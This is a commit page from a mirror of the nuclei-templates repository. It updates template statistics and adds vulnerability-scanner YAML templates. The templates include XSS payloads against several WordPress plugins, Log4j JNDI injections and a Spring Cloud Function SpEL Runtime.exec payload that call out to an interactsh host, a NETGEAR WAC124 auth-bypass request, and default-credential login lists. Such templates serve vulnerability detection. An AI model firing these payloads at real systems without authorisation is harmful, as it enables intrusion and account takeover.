daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'projectdiscovery:master' into master

patch-1
idealphase 2022-03-28 14:05:48 +07:00 committed by GitHub
parent 30a15b0c68 28afc48724
commit 06a553e4a4
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
21 changed files with 1934 additions and 1433 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

22
.new-additions
View File

@ -1,21 +1 @@
cnvd/2021/CNVD-2021-01931.yaml
cnvd/2021/CNVD-2021-14536.yaml
cves/2020/CVE-2020-17456.yaml
cves/2020/CVE-2020-27467.yaml
cves/2021/CVE-2021-41691.yaml
cves/2021/CVE-2021-42063.yaml
cves/2022/CVE-2022-0437.yaml
exposed-panels/avtech-avn801-camera-panel.yaml
exposed-panels/beyondtrust-login-server.yaml
exposed-panels/beyondtrust-panel.yaml
exposed-panels/directadmin-login-panel.yaml
exposed-panels/open-virtualization-manager-panel.yaml
misconfiguration/jolokia/jolokia-info-disclosure.yaml
misconfiguration/jolokia/jolokia-list.yaml
misconfiguration/jolokia/jolokia-mbean-search.yaml
technologies/open-virtualization-manager-detect.yaml
token-spray/api-cloudflare.yaml
vulnerabilities/huawei/huawei-hg255s-lfi.yaml
vulnerabilities/other/oracle-fatwire-lfi.yaml
vulnerabilities/other/tekon-info-leak.yaml
vulnerabilities/wordpress/wordpress-wp-cron.yaml
vulnerabilities/springboot/springboot-log4j-rce.yaml

22
README.md
View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1071 | daffainfo | 546 | cves | 1069 | info | 1094 | http | 2949 |
| panel | 469 | dhiyaneshdk | 407 | exposed-panels | 471 | high | 794 | file | 57 |
| lfi | 433 | pikpikcu | 313 | vulnerabilities | 422 | medium | 625 | network | 49 |
| xss | 338 | pdteam | 257 | technologies | 227 | critical | 389 | dns | 17 |
| wordpress | 329 | geeknik | 174 | exposures | 199 | low | 173 | | |
| exposure | 282 | dwisiswant0 | 165 | misconfiguration | 193 | unknown | 6 | | |
| rce | 272 | 0x_akoko | 115 | workflows | 185 | | | | |
| cve2021 | 260 | princechaddha | 109 | token-spray | 149 | | | | |
| tech | 238 | gy741 | 109 | default-logins | 78 | | | | |
| wp-plugin | 235 | pussycat0x | 104 | takeovers | 67 | | | | |
| cve | 1080 | daffainfo | 550 | cves | 1079 | info | 1105 | http | 2983 |
| panel | 475 | dhiyaneshdk | 411 | exposed-panels | 477 | high | 808 | file | 57 |
| lfi | 437 | pikpikcu | 314 | vulnerabilities | 428 | medium | 630 | network | 49 |
| xss | 344 | pdteam | 258 | technologies | 229 | critical | 390 | dns | 17 |
| wordpress | 334 | geeknik | 176 | exposures | 199 | low | 176 | | |
| exposure | 283 | dwisiswant0 | 165 | misconfiguration | 195 | unknown | 6 | | |
| rce | 274 | 0x_akoko | 117 | workflows | 185 | | | | |
| cve2021 | 264 | gy741 | 112 | token-spray | 150 | | | | |
| tech | 240 | princechaddha | 109 | default-logins | 82 | | | | |
| wp-plugin | 239 | pussycat0x | 107 | takeovers | 67 | | | | |
**236 directories, 3310 files**.
**239 directories, 3325 files**.
</td>
</tr>

2
TEMPLATES-STATS.json
View File

File diff suppressed because one or more lines are too long

2790
TEMPLATES-STATS.md
View File

File diff suppressed because it is too large Load Diff

20
TOP-10.md
View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1071 | daffainfo | 546 | cves | 1069 | info | 1094 | http | 2949 |
| panel | 469 | dhiyaneshdk | 407 | exposed-panels | 471 | high | 794 | file | 57 |
| lfi | 433 | pikpikcu | 313 | vulnerabilities | 422 | medium | 625 | network | 49 |
| xss | 338 | pdteam | 257 | technologies | 227 | critical | 389 | dns | 17 |
| wordpress | 329 | geeknik | 174 | exposures | 199 | low | 173 | | |
| exposure | 282 | dwisiswant0 | 165 | misconfiguration | 193 | unknown | 6 | | |
| rce | 272 | 0x_akoko | 115 | workflows | 185 | | | | |
| cve2021 | 260 | princechaddha | 109 | token-spray | 149 | | | | |
| tech | 238 | gy741 | 109 | default-logins | 78 | | | | |
| wp-plugin | 235 | pussycat0x | 104 | takeovers | 67 | | | | |
| cve | 1080 | daffainfo | 550 | cves | 1079 | info | 1105 | http | 2983 |
| panel | 475 | dhiyaneshdk | 411 | exposed-panels | 477 | high | 808 | file | 57 |
| lfi | 437 | pikpikcu | 314 | vulnerabilities | 428 | medium | 630 | network | 49 |
| xss | 344 | pdteam | 258 | technologies | 229 | critical | 390 | dns | 17 |
| wordpress | 334 | geeknik | 176 | exposures | 199 | low | 176 | | |
| exposure | 283 | dwisiswant0 | 165 | misconfiguration | 195 | unknown | 6 | | |
| rce | 274 | 0x_akoko | 117 | workflows | 185 | | | | |
| cve2021 | 264 | gy741 | 112 | token-spray | 150 | | | | |
| tech | 240 | princechaddha | 109 | default-logins | 82 | | | | |
| wp-plugin | 239 | pussycat0x | 107 | takeovers | 67 | | | | |

49
cves/2021/CVE-2021-25055.yaml Normal file
View File

@ -0,0 +1,49 @@
id: CVE-2021-25055
info:
name: FeedWordPress < 2022.0123 - Authenticated Reflected XSS
author: DhiyaneshDK
severity: medium
description: |
The plugin is affected by a Reflected Cross-Site Scripting (XSS) within the "visibility" parameter.
reference:
- https://wpscan.com/vulnerability/7ed050a4-27eb-4ecb-9182-1d8fa1e71571
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25055
tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-25055
cwe-id: CWE-79
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D1+onerror%3Dalert%28document.domain%29%3E HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<img src=1 onerror=alert(document.domain)>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

49
cves/2021/CVE-2021-25112.yaml Normal file
View File

@ -0,0 +1,49 @@
id: CVE-2021-25112
info:
name: WHMCS Bridge < 6.4b - Authenticated Reflected XSS
author: DhiyaneshDK
severity: medium
description: |
The plugin does not sanitise and escape the error parameter before outputting it back in admin dashboard, leading to a Reflected Cross-Site Scripting
reference:
- https://wpscan.com/vulnerability/4aae2dd9-8d51-4633-91bc-ddb53ca3471c
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25112
tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-25112
cwe-id: CWE-79
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<img src onerror=alert(document.domain)>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

4
cves/2021/CVE-2021-41691.yaml
View File

@ -1,14 +1,14 @@
id: CVE-2021-41691
info:
name: openSIS Student Information System 8.0 SQl Injection Vulnerability
name: OpenSIS Student Information System 8.0 - Authenticated SQL Injection
author: Bartu Utku SARP
severity: high
reference:
- https://securityforeveryone.com/blog/opensis-student-information-system-0-day-vulnerability-cve-2021-41691
- https://www.exploit-db.com/exploits/50637
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41691
tags: cve,cve2021,opensis,sqli,auth
tags: cve,cve2021,opensis,sqli,authenticated
requests:
- raw:

7
cves/2021/CVE-2021-44228.yaml
View File

@ -22,7 +22,11 @@ info:
requests:
- raw:
- |
GET /?x=${jndi:ldap://${hostName}.{{interactsh-url}}/a} HTTP/1.1
GET /?x=${jndi:ldap://${hostName}.uri.{{interactsh-url}}/a} HTTP/1.1
Host: {{Hostname}}
- |
GET / HTTP/1.1
Host: {{Hostname}}
Accept: ${jndi:ldap://${hostName}.accept.{{interactsh-url}}}
Accept-Encoding: ${jndi:ldap://${hostName}.acceptencoding.{{interactsh-url}}}
@ -43,6 +47,7 @@ requests:
X-Forwarded-For: ${jndi:ldap://${hostName}.xforwardedfor.{{interactsh-url}}}
X-Origin: ${jndi:ldap://${hostName}.xorigin.{{interactsh-url}}}
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word

48
cves/2022/CVE-2022-0148.yaml Normal file
View File

@ -0,0 +1,48 @@
id: CVE-2022-0148
info:
name: All-in-one Floating Contact Form < 2.0.4 - Authenticated Reflected XSS
author: DhiyaneshDK
severity: medium
description: The plugin was vulnerable to reflected XSS on the my-sticky-elements-leads admin page.
reference:
- https://wpscan.com/vulnerability/37665ee1-c57f-4445-9596-df4f7d72c8cd
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0148
tags: cve,cve2022,wordpress,xss,wp-plugin,authenticated
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.40
cve-id: CVE-2022-0148
cwe-id: CWE-79
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin.php?page=my-sticky-elements-leads&search-contact=xxxx%22%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29+x HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<img src onerror=alert(`document.domain`) x">'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

53
cves/2022/CVE-2022-0189.yaml Normal file
View File

@ -0,0 +1,53 @@
id: CVE-2022-0189
info:
name: WP RSS Aggregator < 4.20 - Authenticated Reflected XSS
author: DhiyaneshDK
severity: medium
description: |
The plugin does not sanitise and escape the id parameter in the wprss_fetch_items_row_action AJAX action before outputting it back in the response, leading to a Reflected Cross-Site Scripting.
reference:
- https://wpscan.com/vulnerability/52a71bf1-b8bc-479e-b741-eb8fb9685014
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0189
tags: cve,cve2022,wordpress,xss,wp-plugin,authenticated
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2022-0189
cwe-id: CWE-79
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
id=%3Chtml%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29%3E
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<img src onerror=alert(`document.domain`)>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

39
default-logins/apache/dolphinscheduler-default-login.yaml Normal file
View File

@ -0,0 +1,39 @@
id: dolphinscheduler-default-login
info:
name: Apache DolphinScheduler Default Login
author: For3stCo1d
severity: high
reference: https://github.com/apache/dolphinscheduler
metadata:
shodan-query: http.title:"DolphinScheduler"
tags: apache,dolphinscheduler,default-login,oss
requests:
- raw:
- |
POST /dolphinscheduler/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
userName={{user}}&userPassword={{pass}}
attack: pitchfork
payloads:
user:
- admin
pass:
- dolphinscheduler123
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"msg":"login success"'
- '"sessionId":'
condition: and
- type: status
status:
- 200

63
default-logins/cobbler/hue-default-credential.yaml Normal file
View File

@ -0,0 +1,63 @@
id: hue-default-credential
info:
name: Cloudera Hue Default Admin Login
author: For3stCo1d
severity: high
description: Hue default admin login was discovered.
reference: https://github.com/cloudera/hue
metadata:
shodan-query: title:"Hue - Welcome to Hue"
tags: hue,default-login,oss
requests:
- raw:
- |
GET /hue/accounts/login?next=/ HTTP/1.1
Host: {{Hostname}}
- |
POST /hue/accounts/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username={{user}}&password={{pass}}&next=%2F
attack: pitchfork
payloads:
user:
- admin
- hue
- hadoop
- cloudera
pass:
- admin
- hue
- hadoop
- cloudera
cookie-reuse: true
extractors:
- type: regex
name: csrfmiddlewaretoken
part: body
internal: true
group: 1
regex:
- name='csrfmiddlewaretoken' value='(.+?)'
req-condition: true
stop-at-first-match: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- contains(tolower(body_1), 'welcome to hue')
- contains(tolower(all_headers_2), 'csrftoken=')
- contains(tolower(all_headers_2), 'sessionid=')
condition: and
- type: status
status:
- 302

32
default-logins/emqx/emqx-default-login.yaml Normal file
View File

@ -0,0 +1,32 @@
id: emqx-default-login
info:
name: Emqx Default Login
author: For3stCo1d
severity: high
metadata:
shodan-query: http.favicon.hash:"-670975485"
tags: emqx,default-login
requests:
- raw:
- |
POST /api/v4/auth HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
{"username":"{{user}}","password":"{{pass}}"}
attack: pitchfork
payloads:
user:
- admin
pass:
- public
matchers:
- type: dsl
dsl:
- body == "{\"code\":0}"
- status_code == 200
condition: and

37
default-logins/geoserver/geoserver-default-login.yaml Normal file
View File

@ -0,0 +1,37 @@
id: geoserver-default-login
info:
name: Geoserver Default Login
author: For3stCo1d
severity: high
metadata:
fofa-query: app="GeoServer"
tags: geoserver,default-login
requests:
- raw:
- |
POST /geoserver/j_spring_security_check HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{user}}&password={{pass}}
attack: pitchfork
payloads:
user:
- admin
pass:
- geoserver
matchers-condition: and
matchers:
- type: dsl
dsl:
- "contains(tolower(location), '/geoserver/web')"
- "!contains(tolower(location), 'error=true')"
condition: and
- type: status
status:
- 302

2
exposed-panels/open-virtualization-manager-panel.yaml
View File

@ -1,7 +1,7 @@
id: open-virtualization-manager-panel
info:
name: Open Virtualization Manager Userportal and Webadmin panel
name: Open Virtualization Userportal & Webadmin Panel
author: idealphase
severity: info
description: open-source distributed virtualization solution, designed to manage your entire enterprise infrastructure. oVirt uses the trusted KVM hypervisor and is built upon several other community projects, including libvirt, Gluster, PatternFly, and Ansible.

2
misconfiguration/jolokia/jolokia-mbean-search.yaml
View File

@ -1,7 +1,7 @@
id: jolokia-mbean-search
info:
name: Jolokia -Searching MBeans
name: Jolokia - Searching MBeans
author: pussycat0x
severity: low
reference:

19
technologies/emqx-detection.yaml Normal file
View File

@ -0,0 +1,19 @@
id: emqx-detection
info:
name: Emqx Detection
author: For3stCo1d
severity: info
tags: tech,emqx
requests:
- method: GET
path:
- "{{BaseURL}}/static/emq.ico"
matchers-condition: and
matchers:
- type: dsl
name: favicon
dsl:
- "status_code==200 && ('-670975485' == mmh3(base64_py(body)))"

27
vulnerabilities/other/netgear-wac124-router-auth-bypass.yaml Normal file
View File

@ -0,0 +1,27 @@
id: netgear-wac124-router-auth-bypass
info:
name: NETGEAR WAC124 Router Authentication Bypass
author: gy741
severity: high
description: |
This vulnerability allows network-adjacent attackers to bypass authentication on affected of WAC124, AC2000 routers. Authentication is not required to exploit this vulnerability.
reference:
- https://flattsecurity.medium.com/finding-bugs-to-trigger-unauthenticated-command-injection-in-a-netgear-router-psv-2022-0044-2b394fb9edc
- https://kb.netgear.com/000064730/Security-Advisory-for-Multiple-Vulnerabilities-on-the-WAC124-PSV-2022-0044
tags: netgear,auth-bypass,router,iot
requests:
- method: GET
path:
- "{{BaseURL}}/setup.cgi?next_file=debug.htm&x=currentsetting.htm"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Enable Telnet"

47
vulnerabilities/springboot/springboot-log4j-rce.yaml Normal file
View File

@ -0,0 +1,47 @@
id: springboot-log4j-rce
info:
name: Spring Boot Log4j Remote Code Injection
author: pdteam
severity: critical
remediation: Upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later).
reference:
- https://logging.apache.org/log4j/2.x/security.html
- https://www.lunasec.io/docs/blog/log4j-zero-day/
- https://github.com/twseptian/Spring-Boot-Log4j-CVE-2021-44228-Docker-Lab
tags: springboot,rce,oast,log4j
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.00
cve-id: CVE-2021-44228
cwe-id: CWE-502
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
X-Api-Version: ${jndi:ldap://${hostName}.{{interactsh-url}}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output

33
vulnerabilities/springcloud/springcloud-function-spel-rce.yaml Normal file
View File

@ -0,0 +1,33 @@
id: springcloud-function-spel-rce
info:
name: Spring Cloud Function SPEL RCE
author: Mr-xn
severity: critical
reference:
- https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f
- https://github.com/cckuailong/spring-cloud-function-SpEL-RCE
tags: springcloud,rce
requests:
- raw:
- |
POST /{{rand_base(8)}} HTTP/1.1
Host: {{Hostname}}
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("ping {{interactsh-url}}")
Content-Type: application/x-www-form-urlencoded
{{rand_base(8)}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- "dns"
condition: or
- type: status
status:
- 500